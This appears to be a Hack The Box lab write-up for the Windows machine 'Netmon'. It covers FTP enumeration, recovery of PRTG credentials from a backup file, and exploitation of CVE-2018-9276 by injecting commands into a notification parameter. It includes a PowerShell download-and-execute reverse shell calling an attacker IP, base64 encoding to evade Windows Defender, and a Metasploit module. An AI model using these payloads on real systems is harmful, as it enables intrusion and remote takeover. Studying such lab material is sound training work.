HTB: Netmon [Easy]

Netmon is an Easy Windows box featuring PRTG Network Monitor. Initial access gained through anonymous FTP, revealing sensitive configuration files. Credentials recovered from backup files enabled authenticated access to PRTG. Exploited CVE-2018-9276 for RCE via the notification system, achieving SYSTEM-level access.

Reconnaissance

Nmap Scan

Command used:

nmap -Pn -sCV -v -oA nmap/netmon 10.129.230.176

Scan Results

# Nmap 7.98 scan initiated Mon Jan 19 11:50:36 2026 as: /usr/lib/nmap/nmap --privileged -Pn -sCV -v -oA nmap/netmon 10.129.230.176
Nmap scan report for 10.129.230.176
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-19T03:50:51
|_  start_date: 2026-01-19T03:29:52
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 19 11:50:58 2026 -- 1 IP address (1 host up) scanned in 21.72 seconds

Key Findings

• FTP (21): Anonymous login enabled with full C:\ drive access
• HTTP (80): PRTG Network Monitor v18.1.37.13946
• SMB (139/445): Windows file sharing enabled
• WinRM (5985): Remote management available

Initial Foothold

FTP Enumeration

Anonymous FTP access granted full filesystem browsing capabilities. Successfully retrieved the user flag from C:\Users\Public\user.txt. Initial enumeration using Windows sensitive files reference for additional sensitive files yielded limited results.

HTTP Service Analysis

The web interface presented a login prompt. Attempted default credentials including:

• admin:pass
• admin:admin
• prtgadmin:prtgadmin

SMB Enumeration

Attempted SMB enumeration using standard tools:

enum4linux -a 10.129.230.176
smbclient -L //10.129.230.176
smbmap -H 10.129.230.176

No accessible shares found without valid credentials. SMB enumeration yielded no significant findings at this stage.

All authentication attempts failed. Research revealed CVE-2018-9276 for this PRTG version, requiring authenticated access.

Credential Extraction

Command used:

grep -B5 -A5 -i password PRTG\ Configuration.old.bak | sed 's/ //g' | sort -u

Extracted credentials snippet:

<proxyport>
	PrTg@dmin2018
PRTGSystemAdministrator
<retrysnmp>
	<!--User:prtgadmin-->
</wbemprotocol>

Initial login attempt with prtgadmin:PrTg@dmin2018 failed.

Password Pattern Analysis

Examining file timestamps in C:\ProgramData\Paessler\PRTG Network Monitor\, the backup file was dated 07-14-2018, while active configuration files showed 2019 dates.

Hypothesized year-based password increment policy. Updated credentials:

prtgadmin:PrTg@dmin2018 → prtgadmin:PrTg@dmin2019

Authenticated successfully!

Exploitation

CVE-2018-9276 - Authenticated RCE

Upon successful authentication, gained access to the PRTG System Administrator Dashboard.

Research identified CVE-2018-9276 affecting PRTG version 18.1.37.13946, enabling authenticated RCE through the notification system’s Program Execution feature.

Exploitation Steps

Navigated to: Setup → Account Settings → Notifications

Selected Execute Program notification type:

Configuration:

• Program File: Demo exe notification - outfile.ps1
• Parameter: test | ping -n 1 10.10.14.27

RCE Verification

Started tcpdump listener for ICMP packets:

sudo tcpdump -i tun0 icmp

Triggered notification and confirmed ICMP packets received, verifying command execution.

Reverse Shell 1 (Failed)

Used Invoke-PowerShellTcp.ps1 from Nishang.

Setup:

# Start web server
python3 -m http.server 80

# Start listener
nc -lvnp 4444

Payload:

test | powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.27:80/reverse.ps1')"

Result: Failed. Windows Defender flagged and blocked the script execution.

Reverse Shell 2 (Success)

Solution: Base64 encode the PowerShell script to evade AV detection.

Encoding command:

cat reverse.ps1 | iconv -t UTF-16LE | base64 -w 0 | xclip -selection clipboard

Note: xclip -selection clipboard automatically copies output to clipboard for easy pasting.

Final payload:

test | powershell -enc BASE64_ENCODED_PAYLOAD

Successfully obtained reverse shell as NT AUTHORITY\SYSTEM. Both user and root flags retrieved.

Alternative Methods

Metasploit module available for automated exploitation:

use exploit/windows/http/prtg_authenticated_rce

Badge